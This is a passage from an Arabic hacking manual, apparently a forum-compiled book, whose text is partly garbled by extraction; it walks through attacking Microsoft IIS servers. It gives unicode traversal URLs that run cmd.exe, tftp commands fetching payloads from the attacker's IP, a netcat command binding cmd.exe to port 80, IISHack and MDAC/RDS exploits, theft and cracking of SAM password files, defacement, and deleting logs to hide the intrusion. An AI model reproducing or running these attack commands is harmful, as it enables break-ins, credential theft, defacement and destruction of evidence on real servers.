‫ﻓﻲﺗﻮﻟﯿﻔﺔ ﻫﺬااﻻﻣ ﺮ ﯾﻘﻮماﻟﻜﻼﯾﻨ ﺖﺑﻄﻠﺐاﻟﻤﻠ ﻒاﻟﻤﺴﻤﻰ ‪index.htm‬ﻟﯿ ﻀﻌﻪﻓﻲ ﺟﻬﺎزهﻓﻲاﻟﻤﺠﻠﺪ‬
‫‪wwwroot‬‬
‫ﺘﻠ ﻒ ﻣﻦاﻟﻮ ﺿﻊاﻟﻌﺎدي ﻋﻦ و ﺿﻊاﻟﯿﻮﻧﯿﻜﻮد ﻓﻤﺎ ﻫﻮاﻟ ﺤ ﻞ ؟‬ ‫وﻟﻜﻦ ﻻﺗﻨﺴﻰﻓﺸﻜ ﻞﺗﻮﻟﯿﻔﺔاﻻواﻣ ﺮ ﯾﺨ‬
‫ﺘﻲﻟﺪﯾﻚ‬ ‫ﺘ ﻀﻌﻪﻓﻲاﻟﺜﻐ ﺮهاﻟ‬ ‫اﻟ ﺤ ﻞ ﻫﻮانﺗ ﺤﻮ لﺗﻮﻟﯿﻔﺔاﻻﻣ ﺮاﻟﻰ ﯾﻮﻧﯿﻜﻮدﻟ‬
‫ﺘﺎﻟﻲ ‪:‬‬‫ﺑﻌﺪﺗ ﺤﻮﯾ ﻞاﻻﻣ ﺮاﻟﻰ ﯾﻮﻧﯿﻜﻮد ﺳﯿﺼﺒﺢ ﺷﻜﻠﻪﻛﺎﻟ‬
‫‪tftp.exe+"-‬‬
‫‪i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm‬‬
‫ﯾﺎﻟﻠ ﺮوﻋﻪﻟﻘﺪﺗﺠﺎوزﻧﺎاﻟﻌﻘﺒﻪﺑﺎﻟﻔﻌ ﻞ ‪(:‬‬

‫ـ ‪index.htm‬‬ ‫ﺘﺠﻬﯿﺰ ﻣﻠ ﻒاﻟ‬‫ﻗﻢﺑ‬ ‫ـ ‪ TFTP‬و‬ ‫ﺘﺸﻐﯿ ﻞ ﺳﯿ ﺮﻓ ﺮاﻟ‬


‫اﻻنﻗﻢﺑ‬
‫ﺘﻮﻟﯿﻔﻪﻟﯿﺼﺒﺢﻓﻲاﻟﻨﻬﺎﯾﻪ ﻋﻠﻰ ﻫﺬااﻟﻨ ﺤﻮ‬
‫ﻗﻊ ﻋﺒ ﺮﺛﻐ ﺮةاﻟﯿﻮﻧﯿﻜﻮداﻟﻤ ﻀﺎ فاﻟﯿﻬﺎ ﻫﺬهاﻟ‬ ‫ﻗﻢﺑﺎﻻﺗﺼﺎ ل ﻣﻊاﻟﻤﻮ‬‫و‬
‫‪:‬‬
‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t‬‬
‫‪ftp.exe+"-‬‬
‫‪i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm‬‬

‫ﺘ ﺮا ق ))ﺗﻘ ﺮﯾﺒﺎ ‪(( (:‬‬


‫ﺘﯿﻬﻨﺎ ﻣﻦ ﻋﻤﻠﯿﺔاﻻ ﺧ‬
‫ﺘ ﺮﻧ ﺖ واﻧ‬
‫ﺘ ﺤﻤﯿ ﻞاﻟﺼﻔ ﺤﺔاﻟﻰاﻻﻧ‬‫ﻮﻫﻜﺬاﻗﻤﻨﺎﺑ‬
‫ﺘ ﺤﻤﯿ ﻞ ﻣﻠﻔﺎ ت ‪EXE‬اﯾ ﻀﺎ وﺗﺸﻐﯿﻠﻬﺎ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮﺑﻨﻔ ﺲاﻻﺳﻠﻮب وﻫﺬا ﻣﺜﺎ ل ‪:‬‬ ‫ﻣﻠ ﺤﻮﻇﻪ ‪ :‬ﯾﻤﻜﻨﻚانﺗﻘﻮمﺑ‬
‫ﻟﻨﻔ ﺮ ضاﻧﻨﺎ ﻧ ﺮﯾﺪﺗ ﺤﻤﯿ ﻞ ﻣﻠ ﻒ ‪ EXE‬ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ وﺳﻤﯿﻨﺎه ‪ hunter.exe‬وﻧ ﺮﯾﺪﺗﺸﻐﯿﻠﻪﻓﻜﯿ ﻒﻟﻨﺎ ذﻟﻚ ؟‬
‫ﺘﺒﻊاﻻﺗﻲ ‪:‬‬ ‫ﺳﻨ‬
‫ﺘ ﺤﻤﯿ ﻞ ‪ index.htm‬وﻧ ﻀﻌﻪﻓﻲ \‪C:‬ﻟﻠﺴﯿ ﺮﻓ ﺮ ﻋﺒ ﺮ ﻫﺬه‬ ‫ﺘ ﺤﻤﯿ ﻞاﻟﻤﻠ ﻒ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮﻛﻤﺎﻗ ﻤﻨﺎﺑ‬
‫ﻧﻘﻮمﺑ‬
‫ﺘﻮﻟﯿﻔﻪ ‪:‬‬‫اﻟ‬
‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t‬‬
‫‪ftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe‬‬

‫ﺘﻢﺗ ﺤﻤﯿ ﻞاﻟﻤﻠ ﻒ ﺳﻨﺸﻐﻠﻪ ﻋﺒ ﺮﺗﻨﻔﯿﺬ ﻫﺬااﻻﻣ ﺮ‬


‫ﺑﻌﺪان ﯾ‬

‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe‬‬
‫او ﻋﻦ ﻃ ﺮﯾ ﻖ ﻫﺬااﻻﻣ ﺮ‬
‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+‬‬
‫‪hunter.exe‬‬

‫ﺘﻬﺎ ءﺑﻘﻲﻟﺪﯾﻨﺎﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ ﻋﻤ ﻞ وا ﺣﺪﻓﻘﻂاﻻ وﻫﻮ ﻣﺴﺢ ﻣﻠﻔﺎ تاﻟﻠﻮج *‪log.‬‬ ‫ﻗﺪﻗﺎرﺑﻨﺎ ﻋﻠﻰاﻻﻧ‬ ‫اﻵن و‬
‫وﺳﯿﻜﻮن ذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ ﻫﺬااﻻﻣ ﺮ ‪:‬‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d‬‬
‫‪el+C:\*.log/s‬‬
‫ﺘﻢﺗﺨﺰﯾﻦﻓﯿﻬﺎﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت وﯾﻔ ﻀ ﻞ ﻣﺴ ﺤﻬﺎاﯾ ﻀﺎ وﻫﻲ ﻣﺜ ﻞاﻟﻤﻠﻔﺎ ت ذا ت‬ ‫ﻫﻨﺎكاﻧﻮا عا ﺧ ﺮى ﻣﻦاﻟﻤﻠﻔﺎ ت ﯾ‬
‫ﺘﺪاد ‪tmp‬‬ ‫اﻻﻣ‬
‫وﻫﺬااﻣ ﺮ ﻣﺴ ﺤﻬﺎ ﻋﺒ ﺮاﻟﯿﻮﻧﯿﻜﻮد ‪:‬‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d‬‬
‫‪el+C:\*.tmp/s‬‬

‫‪١ ٠٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫اﯾ ﻀﺎ ﻣﻠ ﺤﻮﻇﻪ ﻣﻬﻤﻪ وﻫﻲان ﻻﺗﺒﻘﻰاي ﻣﻌﻠﻮﻣﺎ ت ﻋﻨﻚﻓﻲاﻟﺴﯿ ﺮﻓ ﺮﻛﻤﺎ ﯾﻔﻌ ﻞاﻟﺒﻌ ﺾﺑﺬﻛ ﺮاﺳﻤﺎﺋﻬﻢاو‬
‫ﺘ ﺮا ق )) ﺣﺎو لانﺗﺼ ﻞاﻟﻰ ﻫﺬا‬
‫اﯾﻤﯿﻼﺗﻬﻢاﻟ ﺤﻘﯿﻘﯿﻪﻗﻢﺑﻤﺴﺢاي ﺷﻲ ء ﯾﺪ ل ﻋﻠﯿﻚاو ﻋﻠﻰ ﻋﻤﻠﯿﺔاﻻ ﺧ‬
‫ﺘﻮى ((‬‫اﻟﻤﺴ‬
‫ﺘﻤﻜﻦ‬ ‫ﺘﻰﺗ‬ ‫ﻫﻨﺎك ﻋﺪد ﻣﻦاﻻﺷﯿﺎ ء واﻻﻓﻜﺎرﻟﻦاﺗﻄ ﺮ قاﻟﯿﻬﺎ ﻣﺜ ﻞارﺳﺎ لﻓﺎﯾ ﺮوس ﻣﺎاواﻣ ﺮ ﻋﻠﻰ ﻣﻠ ﻒ ‪ bat‬ﺣ‬
‫ﻣﻦ و ﺿﻊ ﻣﺸﻜﻠﻪﻛﺒﯿ ﺮهﻓﻲاﻟﺴﯿ ﺮﻓ ﺮﻟﻜﻲ ﻻ ﯾﻌﻤ ﻞ‬
‫اوانﺗ ﺮﺳ ﻞﻓﺎﯾ ﺮوس ﯾﻘﻮمﺑﻤ ﺤﻮ ﺟﻤﯿﻊ ﻣﻠﻔﺎ تاﻟﻨﻈﺎماوانﺗﻤ ﺮز ﻧﻔﺴﻚﻟﺪﯾﻬﻢﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ ﻋﻦ ﻃ ﺮﯾ ﻖﺑ ﺮاﻣ ﺞ‬
‫ﺘ ﺤﻜﻢ ﻋﻦﺑﻌﺪ وا ﺧﻔﺎﺋﻬﺎﺑﺸﻜ ﻞ ﺟﯿﺪﻓﻲاﻟﻤﺠﻠﺪا ت ذا تاﻟ ﻤﻠﻔﺎ تاﻟﻜﺜﯿ ﺮ )) ﻣﺜ ﻞ )) ‪ system32‬واﻟﻜﺜﯿ ﺮ‬ ‫اﻟ‬
‫اﻟﻜﺜﯿ ﺮ‬
‫><><><><><><><><><><><><><><><><><><><><><><><><><><><><><‬

‫ﻣﻠ ﺤﻮﻇﺎ ت ‪:‬ﻟﻦﺗﻌﻤ ﻞﻫﺬهاﻟﺜﻐ ﺮهﻓﻲﻛ ﻞاﻟ ﺤﺎﻻ تﻓﻬﻨﺎكﺑﻌ ﺾاﻟﺴﯿ ﺮﻓ ﺮا ت ﯾﻘﻮﻣﻮنﺑﻘﻄﻊاﻟﻄ ﺮﯾ ﻖ ﻋﻠﯿﻚ ﻋﻦ‬
‫ﻃ ﺮﯾ ﻖ ﻣﺴﺢ ﻣﻠ ﻒ ‪ tftp‬ﻣﻦ ﺳﯿ ﺮﻓ ﺮاﺗﻬﻢ‬
‫ﻗﯿﻊ ))‬ ‫ﺘﺮ‬
‫)اﻟﻤﻠ ﻒاﻟﻤﺴﺆو ل ﻋﻦ ذﻟﻚ ﻣﻮﺟﻮدﻓﻲاﻟﻤﺠﻠﺪ ‪ (system32‬وﺑﻌ ﺾاﻟﺴﯿ ﺮﻓ ﺮا تﻗﺎﻣ ﺖﺑﻌﻤﻠﯿﺔاﻟ‬
‫ﻗﯿﻌﺎﻟﻬﺬهاﻟﺜﻐ ﺮه ((‬‫ا ﺻﺪر ت ﻣﯿﻜ ﺮوﺳﻮﻓ ﺖﺗ ﺮ‬
‫ﻗﺪ ﯾﻘﻮمﺑﻌﻤ ﻞا ﺻﻄﯿﺎدﻟﻤﺜ ﻞ ﻫﺬه‬ ‫ﻗﺒﺔاﻟﺒﺎﻛﯿ ﺞاﻟﺼﺎدر واﻟﻮارد و‬‫وﺑﻌ ﻀﻬﻢﻗﺪ ﯾﻜﻮن وا ﺿﻊﻓﺎﯾ ﺮ وو ل ﯾﻘﻮمﺑﻤ ﺮا‬
‫اﻟﻌﻤﻠﯿﺎ ت‬
‫ﺘ ﺮﻛﯿﺐﺑ ﺮﻧﺎﻣ ﺞاﻟ ﺤﻤﺎﯾﻪاﻟﻘﻮي ﺟﺪاﻓﻲ ﻧﻈﻢ ‪IIS‬اﻻ وﻫﻮ ‪ Secure IIS‬ﻣﻦ ﺷ ﺮﻛﺔ‬ ‫وا ﺧ ﺮون ﯾﻘﻮﻣﻮنﺑ‬
‫‪Eeye‬‬
‫ﺘﺎﺑﺔ ﻫﺬااﻟﻤﻮ ﺿﻮ ع ))ﻗﺒ ﻞ ﺣﻮاﻟﻲارﺑﻌﺔاﺷﻬ ﺮ ((ﻛﺎن ﻣﺎ ﯾﻘﺎرب ‪٩٠‬‬ ‫واﻟﻌﺪﯾﺪاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻌﻘﺒﺎ ت وﻟﻜﻦ ﻋﻨﺪﻛ‬
‫ﺘﻲﻓﯿﻬﺎ ﻧﻈﺎم ‪IIS‬‬ ‫‪ %‬ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮا تاﻟ‬
‫ﺘﻬﺎ ((اوﻷﻫﻤﺎ لاﻟﻤﺪﯾ ﺮ‪.‬‬‫ﻗ‬‫ﻗﯿﻊ ))ﻟﻌﺪم وﺟﻮده و‬ ‫ﺗ ﺤﻮي ﻫﺬهاﻟﺜﻐ ﺮه وﺑﺪونﺗ ﺮ‬

‫‪١ ٠٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﻟﺪﻟﯿﻞ اﻟﻜﺎﻣﻞ ﻹﺧﱰاق ﺳﲑﻓﺮ ‪" IIS‬‬

‫‪$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪DEMON:‬‬
‫‪$$$$$$$$$$$$‬‬

‫‪----------‬‬
‫ﻣﻘﺪﻣﺔ ‪- :‬‬
‫‪---------‬‬
‫ﺘ ﺮﻧ ﺖ ‪..‬‬
‫ﻗﻊاﻻﻧ‬ ‫ﺘﺨﺪﻣﺔﻓﻲﺗﺸﻐﯿ ﻞ ﻣﻮا‬‫ﺘﺸﺎر ﺳﯿ ﺮﻓ ﺮا ت ‪ IIS‬ﺣﯿﺚﺗﺸﻜ ﻞاﻟﻨﺴﺒﺔاﻻﻛﺒ ﺮاﻟﻤﺴ‬ ‫ﯾﻌﻠﻢاﻟﺠﻤﯿﻊ ﻣﺪىاﻧ‬
‫ﻮﯾﻌﻠﻢاﻟﺠﻤﯿﻊ ﻣﺪى ﺿﻌ ﻒ ﺎﻟﻨﺎ ﺣﯿﺔاﻻﻣﻨﯿﺔﻟﻬﺬهاﻟﺴﯿ ﺮﻓ ﺮا ت ‪..‬ﻟﺬاﻗ ﺮر تاﻟﻘﯿﺎمﺑﺠﻤﻊاﺷﻬ ﺮﺛﻐ ﺮا ت ﻫﺬااﻟﻨﻮ ع‬
‫ﻣﻊﺗﻮ ﺿﯿﺢﻛﯿﻔﯿﺔ ﻋﻤﻠﻬﺎ ‪.‬‬

‫‪---------‬‬
‫ﻣﻼ ﺣﻈﺔ ‪- :‬‬
‫‪---------‬‬
‫ﺘﻤﺪ ﻋﻠﻰاﻟﺒﻮر ت ‪((٨٠‬‬
‫ﻣﻌﻈﻢ ﺎﻟﻄ ﺮ قاﻟﻤﻮﺟﻮدة ﻫﻨﺎﺗﻌﻤ ﻞ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت ‪ IIS4.0‬ﻮ ‪ IIS5.0‬ﻮﺟﻤﯿﻌﻬﺎﺗﻌ‬
‫ﺘﺼﻔﺢ(( ‪.‬‬ ‫ﯾﻌﻨﻲ ﻣﻦ ﺧﻼ لاﻟﻤ‬

‫‪-------------‬‬
‫ﺘﻄﻠﺒﺎ ت ‪- :‬‬ ‫ﺎﻟﻤ‬
‫‪-------------‬‬
‫ﻗﻊ ‪:‬‬
‫‪ CGI-Scanner -١‬ﺟﯿﺪ ‪..‬أﻧﺎاﻓ ﻀ ﻞ( ‪ Whisker‬ﯾﻤﻜﻨﻚﺗﻨﺰﯾﻠﻪ ﻣﻦ ﻫﺬااﻟﻤﻮ‬
‫‪) www.wiretrip.net/rfp‬‬
‫ﻗﻊ‪( http://www.activestate.com/ :‬‬ ‫ﺘﺸﻐﯿ ﻞ ﻣﻠﻔﺎ تاﻟﺒﯿ ﺮ ل)ﯾﻤﻜﻨﻚﺗﻨﺰﯾﻠﻪ ﻣﻦاﻟﻤﻮ‬
‫ﺘﯿ ﻒﺑﯿ ﺮ لﻟ‬ ‫‪ -٢‬ﺎﻛ‬
‫‪ -٣‬وﯾﺐ ﺳﯿ ﺮﻓ ﺮ )اي ﻧﻮ ع( ﺎﺑﺎﺗﺸﻲاو ‪IIS ..‬‬

‫‪-----------------------‬‬
‫‪IIS Hack.exe : -‬‬
‫‪------------------------‬‬
‫ﺘ ﺤﻤﯿ ﻞ ﻧﺴﺨﻪ ذﻛﯿﺔ ﻣﻦ ‪ nc.exe‬ﻮﺟﻌﻠﻬﺎ‬
‫ﺘﺸ ﻒ ﺧﺒ ﺮا ءاﻻﻣﻦﻓﻲ ﺷ ﺮﻛﺔ ‪eEye‬ﺛﻐ ﺮةاﻣﻨﯿﺔﺗﺴﻤﺢﻟﻚﺑ‬ ‫اﻛ‬
‫ﺗﻨﺼ ﺖ ﻋﻠﻰاﻟﻤﻨﻔﺬ ‪.. ٨٠‬‬
‫ﺘﯿﺎزا ت ‪Administrator .‬‬ ‫ﻮﻫﺬا ﺳﯿﻌﻄﯿﻚ ﺳﻄ ﺮاواﻣ ﺮ ‪ cmde.exe‬ﻣﻊاﻣ‬
‫ﻗﻊ ‪. http://www .technotronic.com/‬‬ ‫ﺑﺎﻣﻜﺎﻧﻚاﻧﺰا ل ‪ NC.exe‬ﻮ ‪ IIS Hack.exe‬ﻣﻦاﻟﻤﻮ‬
‫ﻮﯾﺠﺐﺗﺸﻐﯿ ﻞ وﯾﺐ ﺳﯿ ﺮﻓ ﺮﻓﻲ ﺟﻬﺎزكﻗﺒ ﻞﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮة ‪..‬‬
‫ﻗﻢﺑﻨﺴ ﺦاداة ‪ nc.exe‬ﻮ ﺿﻌﻬﺎﻓﻲاﻟﺪﻟﯿ ﻞاﻟ ﺮﺋﯿﺴﻲﻟﻠﻮﯾﺐ ﺳﯿ ﺮﻓ ﺮﻟﺪﯾﻚ )ﻓﻲاﺑﺎﺗﺸﻲ )‪ Htdocs‬ﻮﻓﻲ ‪IIS‬‬
‫ﺎﻟﺪﻟﯿ ﻞ ‪wwwroot .‬‬
‫ﺘﺸﻐﯿ ﻞ ‪IISHack.exe :‬‬ ‫ﺛﻢﻗﻢﺑ‬
‫‪80 your_IP/ncx.exe http://www.target.com/c:\>iishack.exe‬‬
‫ﻮﺑﻌﺪاﺗﻤﺎم ﺎﻟﺨﻄﻮةاﻟﺴﺎﺑﻘﺔﺑﻨﺠﺎ ح ‪:‬‬
‫ﺘﺠﺪاﻣﺎﻣﻚ ‪eGG SheLL‬‬ ‫‪ http://www .target.com/c:\>nc‬ﻮﺳ‬

‫‪١١٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻌﻪ(( ‪.‬‬
‫ﺘﻢﺗ ﺮﻛﯿﺐاﻟ ﺮ‬
‫ﻣﻼ ﺣﻈﺔ ‪:‬ﺗﻌﻤ ﻞ ﻫﺬهاﻟﺜﻐ ﺮة ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت ‪IIS4.0‬ﻓﻘﻂ ))اذاﻟﻢ ﯾ‬

‫‪do you want me to explain what to do next, hey common you must be‬‬
‫‪kidding‬‬
‫‪...hehe....‬‬

‫‪-----------------------‬‬
‫‪MDAC = RDS :-‬‬
‫‪-----------------------‬‬
‫ﻗﻊﺗﻌﺎﻧﻲ ﻣﻨﻬﺎ ‪..‬‬ ‫ﺘﻘﺪاﻧﻬﺎﺛﻐ ﺮةﻗﺪﯾﻤﺔﻗﻠﯿﻼ )ﻟﻜﻨﻲ ﻣﺎ زﻟ ﺖارىان ‪ %٤٠‬ﻣﻦ ﺎﻟﻤﻮا‬ ‫اﻋ‬
‫ﺘﺨﺪم‬‫ﺘﻚ ﻣﺴ‬ ‫ﺘﻢﺗﺸﻐﯿ ﻞ واﻣ ﺮكﺑﺼﻔ‬ ‫ﺘﺸﻐﯿ ﻞاواﻣ ﺮك ﻋﻠﻰاﻟﻨﻈﺎماﻟﻬﺪ فﺑﺸﻜ ﻞ ﻣ ﺤﻠﻲ ‪ ..‬ﺳﯿ‬‫ﺗﺴﻤﺢﻟﻚﻫﺬهاﻟﺜﻐ ﺮةﺑ‬
‫‪SYSTEM‬ﺎيﺑﺼﻼ ﺣﯿﺎ ت ﻣﺪﯾ ﺮاﻟﻨﻈﺎم ‪ ..‬ﻋﻠﻰ ﺎﻟﻌﻤﻮماذاارد ت ﻣﻌ ﺮﻓﺔاذا ﻣﺎﻛﺎناﻟﻨﻈﺎم ﻣﺼﺎﺑﺎﺑﻬﺬه‬
‫اﻟﺜﻐ ﺮةام ﻻ ‪..‬‬
‫ﻗﻢاوﻻﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻨﻈﺎماﻟﻬﺪ ف ‪80 http://www.host.com/ : c:\>nc -nw -w 2‬ﺛﻢﻗﻢﺑﺎرﺳﺎ ل‬
‫اﻻﻣ ﺮ ‪: GET /msadc/msadcs.dll HTTP‬‬
‫ﻗﯿﻌﻪ (( ‪..‬‬
‫ﺘﻢﺗ ﺮ‬‫ﻓﺈذاﻛﺎناﻟ ﺮد ‪: application/x_varg‬ﻓﻬﺬا ﯾﻌﻨﻲان ﺎﻟﻨﻈﺎم ﻣﺼﺎب ))اذاﻟﻢ ﯾ‬
‫ﻗﻊ ‪(( www.wiretrip.net/rfp :‬‬ ‫ﺘﺎ تﺑﯿ ﺮ لﺗﺴﻬ ﻞ ﻋﻠﯿﻚ ﺎﻟﻌﻤ ﻞﻓﻲﻫﺬااﻟﻤﻮ‬
‫ﺑﺎﻣﻜﺎﻧﻚاﯾﺠﺎد ﺳﻜ ﺮﺑ‬
‫‪mdac.pl - msadc2.pl )) v‬‬
‫‪c:\> mdac.pl -h host.com‬‬
‫‪Please type the NT commandline you want to run (cmd /c assumed):\n‬‬
‫‪cmd /c‬‬
‫ﺈذاارد تﺗﻐﯿﯿ ﺮاﻟﺼﻔ ﺤﻪاﻟ ﺮﺋﯿﺴﯿﺔ ﻣﺎ ﻋﻠﯿﻚاﻻﺗﻨﻔﯿﺬ ﺎﻻﻣ ﺮ > ‪: echo hacked by me hehe‬‬
‫‪C:\inetpub\wwwroot\index.htm‬‬
‫ﻗﺼﺪ‬ ‫ﻗﻊﺑﺎﻣﻜﺎﻧﻨﺎﺗ ﺤﻤﯿ ﻞ ‪ Hacker's Swiss knife Army‬ﺎ‬ ‫ﻮإذاأردﻧﺎ ﺎ ﺣﻜﺎماﻟ ﺴﯿﻄ ﺮة ﻋﻠﻰاﻟﻤﻮ‬
‫‪Nc.exe‬ﺑﻮاﺳﻄﺔ ﻫﺬااﻻﻣ ﺮ ‪:‬‬
‫‪%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r‬‬
‫‪nc.exe&&nc.exe -l -p 80 -t -e cmd.exe‬‬
‫ﺘﻤﻜﻦ ﻣﻦﻗ ﺮاءﺗﻪ ﺟﯿﺪا(‬‫ﺘ‬‫ﻗﻢﺑﻘ ﺮا ءةاﻻﻣ ﺮ ﻣﻦاﻟﯿﺴﺎراﻟﻰاﻟﯿﻤﯿﻦﻟ‬ ‫)‬
‫ﺘﯿﺎزا ت ‪Administrator .‬‬ ‫ﺘﺠﺪ ﺳﻄ ﺮاواﻣ ﺮ ﻣﻊاﻣ‬ ‫ﺑﻌﺪﻫﺎﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻨﻈﺎماﻟﻬﺪ ف ﻋﻠﻰاﻟﻤﻨﻔﺬ ‪ ٨٠‬وﺳ‬

‫‪-------------------------------------------------‬‬
‫‪Codebrws.asp & Showcode.asp :-‬‬
‫‪--------------------------------------------------‬‬
‫ﺘ ﺮا ﺿﯿﺎﺑ ﻞ ﯾﺠﺐ ﻋﻠﻰ ﻣﺪﯾ ﺮ‬
‫اﻟﻤﻠﻔﺎن ﻋﺒﺎرة ﻋﻦﻗﺎري ء ﻣﻠﻔﺎ ت ‪ ASP‬ﯾﺄﺗﻲ ﻣﻊ ‪ IIS‬ﻮﻟﻜﻨﻪ ﻻ ﯾﺄﺗﻲ ﻣ ﺤﻤ ﻞاﻓ‬
‫اﻟﻨﻈﺎمﺗﻔﻌﯿﻠﻪ ‪..‬‬
‫ﺘﺴﻔﯿﺪ ﻣﻨﻬﺎﻛﺜﯿ ﺮاﻗﻬﻲﺗﺴﻤﺢﻟﻚﺑﻘ ﺮا ءةاي ﻣﻠ ﻒ(( ‪ .asp‬ﺎﻋﻨﻲ رؤﯾﺔ‬ ‫ﻓﺈذاﻛﺎﻧ ﺖ ﻫﺬهاﻟﺨﺪﻣﺔ ﻣﻔﻌﻠﺔ ﺳ‬
‫اﻟﻤﺼﺪر(( ‪.‬‬
‫ﺘ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎم ))اذاﻛﺎن ﺎﻟﻨﻈﺎم ﻣﺼﺎﺑﺎ (( ‪:‬‬ ‫ﺘﺨﺪام ﻫﺬااﻻﻣ ﺮ ﺳ‬ ‫ﺑﺎﺳ‬
‫_‪http://www.victim.com/msadc/samples...nt/repair/sam.‬‬
‫ﺘﺨﺪاماﻻداةاﻟﻤﻔ ﻀﻠﺔﻟﺪي( ‪LC3.0‬‬ ‫ﺑﻌﺪ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎم ‪Expand it & Crack it ..‬ﺑﺎﺳ‬
‫ﻗ ﻞ ﻣﻦ ‪ ٢٤‬ﺳﺎﻋﻪ ( ‪.‬‬ ‫ﺘﻢﻛﺴ ﺮﻫﺎﻓﻲا‬ ‫ﺳﯿ‬

‫‪١١١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪----------------‬‬
‫‪Null.htw : -‬‬
‫‪----------------‬‬
‫ﺘﻔﺎدة ﻣﻨﻬﺎ ‪..‬‬
‫ﺘﻔﻲﻓﻘﻂﺑﻄ ﺮﯾﻘﺔاﻻﺳ‬
‫ﻋﻤﻠﯿﺔ ﺷ ﺮ حﻛﯿﻔﯿﺔ ﻋﻤ ﻞ ﻫﺬهاﻟﺜﻐ ﺮة ﻣﻌﻘﺪﻗﻠﯿﻼ ‪..‬ﻟﺬا ﺳﺄﻛ‬
‫ﺘﺼﺎرﺗﺴﻤﺢﻟﻚﺑ ﺮؤﯾﺔاﻟﺴﻮرسﻛﻮد ﻻي ﻣﻠ ﻒ ‪ASP ..‬‬ ‫ﺑﺎ ﺧ‬
‫ﺘﻨﻔﯿﺬاﻟﺜﻐ ﺮة ‪http://www.victim.com/null.htw?CiWe...HiliteType=full :‬‬ ‫ﻟ‬
‫ﺳﯿﻌ ﺮ ضﻟﻚﻫﺬااﻟ ﺮاﺑﻂاﻟﺴﻮرسﻛﻮداﻟﺨﺎ صﺑﺎﻟﺼﻔ ﺤﻪ ‪Default.asp .‬‬

‫‪------------------------------‬‬
‫‪webhits.dll & .htw : -‬‬
‫‪------------------------------‬‬
‫ﺘﺠ ﺮﺑﺔاﻟﻠﻨﻚ ﻋﻠﻰاﻟﻨﻈﺎماﻟﻬﺪ ف ‪http://www.victim.com/blabla.htw :‬‬ ‫اوﻻﻗﻢﺑ‬
‫ﻓﺈذاﻛﺎناﻟ ﺮدﺑﻬﺬه ﺎﻟﻌﺒﺎرة ‪: format of the QUERY_STRING is invalid‬ﻓﻬﺬا ﯾﻌﻨﻲان‬
‫اﻟﻨﻈﺎماﻟﻬﺪ ف ﻣﺼﺎبﺑﻨﺴﺒﺔ ‪. %٩٠‬‬
‫ﺎ ﺧﯿ ﺮا ﺟ ﺮبﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮةﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ ‪:‬‬
‫‪www .victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full‬‬
‫ﺘﺄﻛﯿﺪ ﺳﯿﻌﻤ ﻞا ﺣﺪﻫﺎ ‪:‬‬
‫ـ ‪XXXXX/XXXXX/XXXX/XXX.htw‬ﺑﺎ ﺣﺪ ﻫﺬهاﻟﻤﻠ ﺤﻘﺎ ت ‪ ،‬وﺑﺎﻟ‬ ‫ﻣﻊﺗﻐﯿﯿ ﺮاﻟ‬
‫‪iissamples/issamples/oop/qfullhit.htw‬‬
‫‪iissamples/issamples/oop/qsumrhit.htw‬‬
‫‪isssamples/exair/search/qfullhit.htw‬‬
‫‪isssamples/exair/search/qsumrhit.htw‬‬
‫ﺘ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎمﻗﻢﺑﻜﺴ ﺮهﺑﻮاﺳﻄﻪاﻻداة ‪LC3 ..‬‬ ‫ﺘﺎﻟﻲ ﺳ‬‫ﻮﺑﺎﻟ‬

‫‪-------------------------------------------------------‬‬
‫‪[$DATA] ASP Alternate Data Streams:-‬‬
‫‪-------------------------------------------------------‬‬
